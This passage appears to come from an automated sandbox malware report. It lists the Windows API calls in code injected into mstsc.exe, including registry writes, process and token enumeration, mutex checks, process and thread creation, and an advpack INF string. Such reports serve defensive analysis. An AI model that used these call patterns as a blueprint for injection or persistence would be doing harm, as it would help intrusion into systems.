      • Part of subcall function 0006F4A9: GetInputState.USER32 ref: 0006F574
      • Part of subcall function 0006F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006F59E
      • Part of subcall function 0006F4A9: GetProcAddress.KERNEL32(00000000), ref: 0006F5A5
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F5B5
      • Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5C2
      • Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F5C7
      • Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5CE
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F971
    • HeapFree.KERNEL32(00000000), ref: 0006F97E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006F983
    • HeapFree.KERNEL32(00000000), ref: 0006F98A
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0006F4DE
    • HeapAlloc.KERNEL32(00000000), ref: 0006F4E1
    • GetShellWindow.USER32 ref: 0006F4FD
    • GetProcessHeap.KERNEL32(00000008,00000017), ref: 0006F55D
    • HeapAlloc.KERNEL32(00000000), ref: 0006F560
    • GetInputState.USER32 ref: 0006F574
    • GetModuleHandleA.KERNEL32(?,00000000), ref: 0006F59E
    • GetProcAddress.KERNEL32(00000000), ref: 0006F5A5
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F5B5
    • HeapFree.KERNEL32(00000000), ref: 0006F5C2
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006F5C7
    • HeapFree.KERNEL32(00000000), ref: 0006F5CE
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000001F,00000000,?,00000000), ref: 000676D7
    • HeapAlloc.KERNEL32(00000000), ref: 000676DA
    • GetProcessHeap.KERNEL32 ref: 000676EF
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006773B
    • HeapAlloc.KERNEL32(00000000), ref: 0006773E
    • IsSystemResumeAutomatic.KERNEL32 ref: 00067752
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 00067783
    • GetProcAddress.KERNEL32(00000000), ref: 0006778A
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006779E
    • HeapFree.KERNEL32(00000000), ref: 000677A7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 000677AC
    • HeapFree.KERNEL32(00000000), ref: 000677AF
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000047), ref: 00067185
    • HeapAlloc.KERNEL32(00000000), ref: 0006718C
    • RevertToSelf.ADVAPI32 ref: 000671A5
    • GetProcessHeap.KERNEL32(00000008,00000006), ref: 000671E8
    • HeapAlloc.KERNEL32(00000000), ref: 000671EF
    • GetCurrentProcessId.KERNEL32 ref: 00067203
    • wsprintfA.USER32 ref: 0006723A
    • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00067253
    • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00067272
    • RegCloseKey.ADVAPI32(00000000), ref: 0006727B
    • Sleep.KERNEL32(000003E8), ref: 0006728C
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 0006790B
    • HeapAlloc.KERNEL32(00000000), ref: 0006790E
    • GetShellWindow.USER32 ref: 00067923
    • GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006797E
    • HeapAlloc.KERNEL32(00000000), ref: 00067981
    • GetDoubleClickTime.USER32 ref: 00067995
    • GetModuleHandleA.KERNEL32(00067A46), ref: 000679C5
    • GetProcAddress.KERNEL32(00000000,00000000), ref: 000679CD
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000679E8
    • HeapFree.KERNEL32(00000000), ref: 000679F5
    • GetProcessHeap.KERNEL32(00000000,00067A46), ref: 000679FA
    • HeapFree.KERNEL32(00000000), ref: 00067A01
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000C,?,7142434B,00106D80), ref: 0006A845
    • HeapAlloc.KERNEL32(00000000), ref: 0006A84C
    • GetMessageExtraInfo.USER32 ref: 0006A868
    • GetProcessHeap.KERNEL32(00000008,00000016), ref: 0006A8CF
    • HeapAlloc.KERNEL32(00000000), ref: 0006A8D6
    • GetDoubleClickTime.USER32 ref: 0006A8EA
    • LoadLibraryA.KERNEL32(?), ref: 0006A914
    • GetProcAddress.KERNEL32(00000000), ref: 0006A91B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A94F
    • HeapFree.KERNEL32(00000000), ref: 0006A95C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006A961
    • HeapFree.KERNEL32(00000000), ref: 0006A968
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000A,00000001,00000000,76E6FE8D), ref: 0006A50C
    • HeapAlloc.KERNEL32(00000000), ref: 0006A50F
    • GetMessagePos.USER32 ref: 0006A52A
    • GetProcessHeap.KERNEL32(00000008,00000013), ref: 0006A593
    • HeapAlloc.KERNEL32(00000000), ref: 0006A596
    • GetCurrentThreadId.KERNEL32 ref: 0006A5AA
    • LoadLibraryA.KERNEL32(?), ref: 0006A5D4
    • GetProcAddress.KERNEL32(00000000), ref: 0006A5DB
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A5EF
    • HeapFree.KERNEL32(00000000), ref: 0006A5F2
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A614
    • HeapFree.KERNEL32(00000000), ref: 0006A617
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0007CD20), ref: 0006F60E
    • HeapAlloc.KERNEL32(00000000), ref: 0006F611
    • GetShellWindow.USER32 ref: 0006F62D
    • GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F678
    • HeapAlloc.KERNEL32(00000000), ref: 0006F67B
    • GetLogicalDrives.KERNEL32 ref: 0006F68F
    • GetModuleHandleA.KERNEL32(0006BF20,00000000), ref: 0006F6B9
    • GetProcAddress.KERNEL32(00000000), ref: 0006F6C0
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F6D0
    • HeapFree.KERNEL32(00000000), ref: 0006F6DD
    • GetProcessHeap.KERNEL32(00000000,0006BF20), ref: 0006F6E2
    • HeapFree.KERNEL32(00000000), ref: 0006F6E9
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000029), ref: 00063209
    • HeapAlloc.KERNEL32(00000000), ref: 00063210
    • GetCapture.USER32 ref: 0006321F
    • HeapFree.KERNEL32(00000000), ref: 000632F0
      • Part of subcall function 0006B964: Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000,00072000,00000000,00000000,?,?,?,0006329E), ref: 0006B9AC
    • Sleep.KERNEL32(-0000EA60), ref: 000632C2
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000632E9
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000089), ref: 000668BE
    • HeapAlloc.KERNEL32(00000000), ref: 000668C5
    • CountClipboardFormats.USER32 ref: 000668D6
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0006690F
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00066934
    • CloseHandle.KERNEL32(00000000), ref: 00066943
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006694E
    • HeapFree.KERNEL32(00000000), ref: 00066955
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000E,?,7142434B,00106D80), ref: 000673EF
    • HeapAlloc.KERNEL32(00000000), ref: 000673F2
    • GetLogicalDrives.KERNEL32 ref: 00067406
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00067460
    • HeapAlloc.KERNEL32(00000000), ref: 00067463
    • IsSystemResumeAutomatic.KERNEL32 ref: 00067477
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 000674A8
    • GetProcAddress.KERNEL32(00000000), ref: 000674AF
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000674BE
    • HeapFree.KERNEL32(00000000), ref: 000674C7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 000674CC
    • HeapFree.KERNEL32(00000000), ref: 000674CF
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000061,76AD46E9,7142434B,76E6FE8D), ref: 0006EF0F
    • HeapAlloc.KERNEL32(00000000), ref: 0006EF12
    • GetForegroundWindow.USER32 ref: 0006EF23
    • OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 0006EF58
    • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0006EF6B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006EF73
    • HeapFree.KERNEL32(00000000), ref: 0006EF76
    • ExitProcess.KERNEL32 ref: 0006EF84
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 00061000: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?,?,?), ref: 0006107A
      • Part of subcall function 00061000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00061992), ref: 0006107D
      • Part of subcall function 00061000: wsprintfW.USER32 ref: 00061093
      • Part of subcall function 00061000: lstrlenW.KERNEL32(00000000), ref: 000610A7
      • Part of subcall function 00061000: GetProcessHeap.KERNEL32(00000008,00000000), ref: 000610B7
      • Part of subcall function 00061000: HeapAlloc.KERNEL32(00000000), ref: 000610BA
      • Part of subcall function 00061000: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 000610D1
      • Part of subcall function 00061000: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000610F4
      • Part of subcall function 00061000: HeapFree.KERNEL32(00000000), ref: 000610FB
    • StrDupW.SHLWAPI(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00061992), ref: 0006158B
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 000615D6
    • HeapAlloc.KERNEL32(00000000), ref: 000615D9
    • GetClipboardViewer.USER32 ref: 000615E8
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061639
    • HeapFree.KERNEL32(00000000), ref: 0006163C
      • Part of subcall function 0006DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0006DD37
      • Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD44
      • Part of subcall function 0006DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0006DD6B
      • Part of subcall function 0006DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00061970,?), ref: 0006DD76
      • Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD80
      • Part of subcall function 0006DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00061970,?), ref: 0006DD95
      • Part of subcall function 0006DD0B: CloseHandle.KERNEL32(00000000), ref: 0006DD9C
      • Part of subcall function 0006DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00061970,?), ref: 0006DDA9
      • Part of subcall function 0006DD0B: HeapFree.KERNEL32(00000000), ref: 0006DDB0
    • HeapFree.KERNEL32(00000000), ref: 0006167D
      • Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000008,0000003D,00000000,76E6FE8D,00000000), ref: 00061176
      • Part of subcall function 0006110C: HeapAlloc.KERNEL32(00000000), ref: 00061179
      • Part of subcall function 0006110C: CountClipboardFormats.USER32 ref: 0006119F
      • Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000008,000000C1), ref: 000612C8
      • Part of subcall function 0006110C: HeapAlloc.KERNEL32(00000000), ref: 000612CB
      • Part of subcall function 0006110C: GetDialogBaseUnits.USER32 ref: 000612EA
      • Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000008,00000019,00020006), ref: 00061356
      • Part of subcall function 0006110C: HeapAlloc.KERNEL32(00000000), ref: 00061359
      • Part of subcall function 0006110C: GetDialogBaseUnits.USER32 ref: 00061372
      • Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000008,00000019), ref: 000613C4
      • Part of subcall function 0006110C: HeapAlloc.KERNEL32(00000000), ref: 000613C7
      • Part of subcall function 0006110C: GetCurrentThreadId.KERNEL32 ref: 000613E0
      • Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000008,00000025), ref: 0006143F
      • Part of subcall function 0006110C: HeapAlloc.KERNEL32(00000000), ref: 00061442
      • Part of subcall function 0006110C: ReleaseCapture.USER32 ref: 00061458
      • Part of subcall function 0006110C: RegSetValueExW.ADVAPI32(00000006,?,00000000,00000004,00000001,00000004), ref: 0006149A
      • Part of subcall function 0006110C: RegSetValueExW.ADVAPI32(00000006,774C5173,00000000,00000001,?,?), ref: 000614CE
      • Part of subcall function 0006110C: RegSetValueExW.ADVAPI32(00000006,00000000,00000000,00000001,?,?), ref: 00061500
      • Part of subcall function 0006110C: RegCloseKey.ADVAPI32(00000006), ref: 00061505
      • Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061515
      • Part of subcall function 0006110C: HeapFree.KERNEL32(00000000), ref: 0006151E
      • Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000000,774C5173), ref: 00061524
      • Part of subcall function 0006110C: HeapFree.KERNEL32(00000000), ref: 00061527
      • Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000000,?), ref: 0006152D
      • Part of subcall function 0006110C: HeapFree.KERNEL32(00000000), ref: 00061530
      • Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00061542
      • Part of subcall function 0006110C: HeapFree.KERNEL32(00000000), ref: 0006154B
      • Part of subcall function 0006110C: GetProcessHeap.KERNEL32(00000000,?), ref: 00061551
      • Part of subcall function 0006110C: HeapFree.KERNEL32(00000000), ref: 00061554
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00061992), ref: 0006166C
    • HeapFree.KERNEL32(00000000), ref: 0006166F
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00061992), ref: 0006167A
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0007CD20), ref: 0006F60E
      • Part of subcall function 0006F5D9: HeapAlloc.KERNEL32(00000000), ref: 0006F611
      • Part of subcall function 0006F5D9: GetShellWindow.USER32 ref: 0006F62D
      • Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F678
      • Part of subcall function 0006F5D9: HeapAlloc.KERNEL32(00000000), ref: 0006F67B
      • Part of subcall function 0006F5D9: GetLogicalDrives.KERNEL32 ref: 0006F68F
      • Part of subcall function 0006F5D9: GetModuleHandleA.KERNEL32(0006BF20,00000000), ref: 0006F6B9
      • Part of subcall function 0006F5D9: GetProcAddress.KERNEL32(00000000), ref: 0006F6C0
      • Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F6D0
      • Part of subcall function 0006F5D9: HeapFree.KERNEL32(00000000), ref: 0006F6DD
      • Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000000,0006BF20), ref: 0006F6E2
      • Part of subcall function 0006F5D9: HeapFree.KERNEL32(00000000), ref: 0006F6E9
      • Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000008,00000250,?,7142434B,0007CD20), ref: 0006BB67
      • Part of subcall function 0006BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BB70
      • Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BB86
      • Part of subcall function 0006BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BB89
      • Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BB9D
      • Part of subcall function 0006BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BBA0
      • Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0006BBE4
      • Part of subcall function 0006BB40: HeapAlloc.KERNEL32(00000000), ref: 0006BBE7
      • Part of subcall function 0006BB40: ReleaseCapture.USER32 ref: 0006BBF9
      • Part of subcall function 0006BB40: GetSystemDirectoryW.KERNEL32(0007CD24,00000103), ref: 0006BC4D
      • Part of subcall function 0006BB40: lstrcatW.KERNEL32(0007CD24,00000000), ref: 0006BC84
      • Part of subcall function 0006BB40: FindFirstFileW.KERNEL32(0007CD24,?), ref: 0006BC8E
      • Part of subcall function 0006BB40: StrRChrW.SHLWAPI(?,00000000,0000002E), ref: 0006BCD3
      • Part of subcall function 0006BB40: FindNextFileW.KERNEL32(?,?), ref: 0006BD84
      • Part of subcall function 0006BB40: FindFirstFileW.KERNEL32(0007CD24,?), ref: 0006BD90
      • Part of subcall function 0006BB40: FindClose.KERNEL32(?), ref: 0006BDC4
      • Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0006BDDB
      • Part of subcall function 0006BB40: HeapFree.KERNEL32(00000000), ref: 0006BDDE
      • Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BDE8
      • Part of subcall function 0006BB40: HeapFree.KERNEL32(00000000), ref: 0006BDEB
      • Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000000,0007CD24,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BDFA
      • Part of subcall function 0006BB40: HeapFree.KERNEL32(00000000), ref: 0006BDFD
      • Part of subcall function 0006BB40: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BE07
      • Part of subcall function 0006BB40: HeapFree.KERNEL32(00000000), ref: 0006BE0A
    • GetProcessHeap.KERNEL32(00000008,00000015,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006BF97
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,7142434B,00106D80), ref: 0006BF9A
    • GetFocus.USER32 ref: 0006BFAB
    • lstrcatW.KERNEL32(00000000), ref: 0006BFDE
    • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006C012
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006C042
    • HeapFree.KERNEL32(00000000), ref: 0006C045
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • FindAtomW.KERNEL32(?), ref: 00066F8C
    • AddAtomW.KERNEL32(?), ref: 00066FA2
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00066FAC
    • HeapAlloc.KERNEL32(00000000), ref: 00066FB3
    • OpenProcess.KERNEL32(00100410,00000000,?), ref: 0006701E
    • GetProcessImageFileNameA.PSAPI(00000000,?,00000104), ref: 00067037
    • CloseHandle.KERNEL32(00000000), ref: 0006703E
    • lstrlenA.KERNEL32(?), ref: 00067051
    • lstrlenA.KERNEL32(?), ref: 0006705E
      • Part of subcall function 0006E545: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0006E667), ref: 0006E55F
      • Part of subcall function 0006E545: GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0006E667), ref: 0006E58D
      • Part of subcall function 0006E545: HeapAlloc.KERNEL32(00000000,?,0006E667), ref: 0006E594
      • Part of subcall function 0006E545: GetProcessHeap.KERNEL32(00000000,00000000,?,0006E667), ref: 0006E5E9
      • Part of subcall function 0006E545: HeapFree.KERNEL32(00000000,?,0006E667), ref: 0006E5F0
      • Part of subcall function 00064AB4: OpenProcess.KERNEL32(00000400,00000000), ref: 00064AFF
      • Part of subcall function 00064AB4: GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00064B21
      • Part of subcall function 00064AB4: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00064B58
      • Part of subcall function 00064AB4: HeapAlloc.KERNEL32(00000000), ref: 00064B5F
      • Part of subcall function 00064AB4: GetForegroundWindow.USER32 ref: 00064B70
      • Part of subcall function 00064AB4: wsprintfA.USER32 ref: 00064BAD
      • Part of subcall function 00064AB4: FindAtomA.KERNEL32(?), ref: 00064BBD
      • Part of subcall function 00064AB4: GlobalFindAtomA.KERNEL32(?), ref: 00064BD2
      • Part of subcall function 00064AB4: GlobalAddAtomA.KERNEL32(?), ref: 00064BE4
      • Part of subcall function 00064AB4: AddAtomA.KERNEL32(?), ref: 00064BF1
      • Part of subcall function 00064AB4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064BFD
      • Part of subcall function 00064AB4: HeapFree.KERNEL32(00000000), ref: 00064C04
      • Part of subcall function 00064AB4: CloseHandle.KERNEL32(?), ref: 00064C0D
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006487E
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064881
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006489A
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006489D
      • Part of subcall function 0006485C: OpenProcess.KERNEL32(00000400,00000000), ref: 000648D1
      • Part of subcall function 0006485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00064907
      • Part of subcall function 0006485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00064921
      • Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00064942
      • Part of subcall function 0006485C: GetLastError.KERNEL32 ref: 00064944
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00064958
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006495B
      • Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00064979
      • Part of subcall function 0006485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0006499D
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00064A0C
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064A0F
      • Part of subcall function 0006485C: GetCursor.USER32 ref: 00064A20
      • Part of subcall function 0006485C: wsprintfW.USER32 ref: 00064A53
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064A6C
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A75
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A7C
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A7F
      • Part of subcall function 0006485C: CloseHandle.KERNEL32(00000000), ref: 00064A84
      • Part of subcall function 0006485C: CloseHandle.KERNEL32(?), ref: 00064A8D
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A9B
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A9E
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064AA3
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064AA6
    • StrCmpIW.SHLWAPI(?,0007CAB0), ref: 000670AB
    • CreateThread.KERNEL32(00000000,00000000,Function_00004D73,?,00000000,00000000), ref: 000670BF
    • CloseHandle.KERNEL32(00000000), ref: 000670C6
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 0006A626: GetProcessHeap.KERNEL32(00000008,0000006D,?,00000000,00000000), ref: 0006A6B0
      • Part of subcall function 0006A626: HeapAlloc.KERNEL32(00000000), ref: 0006A6B3
      • Part of subcall function 0006A626: GetCurrentThreadId.KERNEL32 ref: 0006A6C5
      • Part of subcall function 0006A626: GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0006A717
      • Part of subcall function 0006A626: HeapAlloc.KERNEL32(00000000), ref: 0006A71A
      • Part of subcall function 0006A626: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A766
      • Part of subcall function 0006A626: HeapFree.KERNEL32(00000000), ref: 0006A76D
    • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?,?,?), ref: 0006107A
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00061992), ref: 0006107D
    • wsprintfW.USER32 ref: 00061093
    • lstrlenW.KERNEL32(00000000), ref: 000610A7
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000610B7
    • HeapAlloc.KERNEL32(00000000), ref: 000610BA
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 000610D1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000610F4
    • HeapFree.KERNEL32(00000000), ref: 000610FB
    Strings
    • [Version]signature = "$CHICAGO$"AdvancedINF = 2.5, "You need a new version of advpack.dll"[DefaultInstall]RunPreSetupCom, xrefs: 0006108A
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0006BE64
    • HeapAlloc.KERNEL32(00000000), ref: 0006BE6B
    • GetFocus.USER32 ref: 0006BE7C
    • GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0006BEB5
    • lstrlenA.KERNEL32(?), ref: 0006BEC9
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BEEA
    • HeapFree.KERNEL32(00000000), ref: 0006BEF1
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • WaitForSingleObject.KERNEL32(000000FF), ref: 000672AF
    • GetCurrentProcessId.KERNEL32 ref: 000672D7
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006487E
